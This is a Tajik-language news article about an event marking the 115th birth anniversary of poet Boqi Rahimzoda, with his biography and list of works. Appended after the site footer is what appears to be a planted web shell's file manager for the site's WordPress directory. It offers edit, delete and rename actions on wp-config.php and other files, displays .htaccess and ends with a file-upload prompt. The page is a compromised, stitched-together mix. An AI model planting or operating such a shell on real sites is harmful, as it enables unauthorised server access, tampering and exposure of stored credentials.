36.2 C
Душанбе

Муносибати падарона дошт. Ёдкарди адибон аз Боқӣ Раҳимзода

Ба баҳонаи 115-умин солгарди таваллуди устод Боқӣ Раҳимзода адибону пажӯҳишгарон ва бастагони ин шоири номошно дар Осорхонаи миллии Тоҷикистон гирди ҳам омаданд.

Дар ин ҳамоиш, ки рӯзи 14-уми май сурат гирифт, Муҳиддин Панҷшанбезода – мушовири бахши дастёри Президенти Тоҷикистон дар умури робита бо ҷомеъа, Ато Мирхоҷа – муовини раиси Иттифоқи нависандагон, Абдулҳамид Самад – Нависандаи халқии Тоҷикистон, Камол Насруллоҳ – Шоири халқии Тоҷикистон ва дигарон дар бораи шахсияти адабӣ, вижагиҳои инсонӣ ва арзиши ҳунарии ашъори устод Раҳимзода сухан ронданд.

Аз ҷумла таъкид шуд, ки шеърҳо ва таронаҳои ин адиби саршинос муҳаббати ватанро дар худ гунҷонда ва ба дили мардум роҳ ёфтааст. Ҳатто сурудҳои ҷовидона ва пур аз самимияти ӯ монанди “Республикаи ман”, “Иди зафар муборак” ва “Дар лаби обӣ” аз минбарҳои ҷаҳонӣ садо дода, ба хазинаи тилоии адабиёт ва ҳунари тоҷик ворид шудаанд.

Ҳамчунин дар ин ҳамоиш зикр шуд, ки муносибати Боқӣ Раҳимзода ба эҷодкорон бисёр падарона ва мушфиқона буд. Ин буд, ки Пӯлод Толис, Муҳиддин Фарҳат, Ғаффор Мирзо, Лоиқ Шералӣ, Бозор Собир, Гулрухсор ва дигарон аз сӯйи устод Раҳимзода кашф ва пуштибонӣ шуданд.

Бояд гуфт, Боқӣ Раҳимзода 15-уми майи соли 1910 дар деҳаи Сорбоғи ноҳияи Ғарм ба дунё омада, нахуст Техникуми педагогии шаҳри Самарқанд, баъдтар Дорулмуаллимини тоҷикии шаҳри Тошканд ва ниҳоят Институти омӯзгории шаҳри Душанберо бо баҳои аъло хатм кардааст. Аз соли 1948 мушовири ҷавонони эҷодкори Иттифоқи нависандагони Тоҷикистон будааст ва дар ин ҷабҳа корҳои шоёнеро ба сомон расондааст.

Шеърҳои аввалинаш аз охири солҳои 30-юми асри гузашта чоп шудаанд. Муаллифи асарҳои «Ба фронт» (1945), «Иди Ғалаба» (1946), «Солҳои оташин» (1948), «Барги сабз», «Ҳаёт ва сухан» (1955), «Чашма» (1957), достони «Роҳи нури Офтоб» (ҳамроҳи Мирзо Турсунзода, 1964), «Роҳи тайшуда» (мунтахабот, 1966), «Илҳом» (1973), дуҷилдаи «Осор» (1975—1976), «Шохаи гул» (ба форсӣ, 1979), дуҷилдаи «Осор» (1982—1983), «Шеъру достонҳо» (1983) мебошад.

Устод Раҳимзода бо Ҷоизаи Абуабдуллоҳи Рӯдакӣ, ордени “Байрақи сурхи меҳнат” ва унвони Шоири халқии Тоҷикистон сарфароз гардонида шуда, аз соли 1940 узви Иттифоқи нависандагони Тоҷикистон мебошад.

Боқӣ Раҳимзода 30-уми январи соли 1980 дар 70-солагӣ аз олам даргузашт.

- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Viewing: /var/www/adab.tj/html/.htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


# BEGIN WordPress
# Директивы (строки) между `BEGIN WordPress` и `END WordPress`
# созданы автоматически и подлежат изменению только через фильтры WordPress.
# Сделанные вручную изменения между этими маркерами будут перезаписаны.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
Upload File: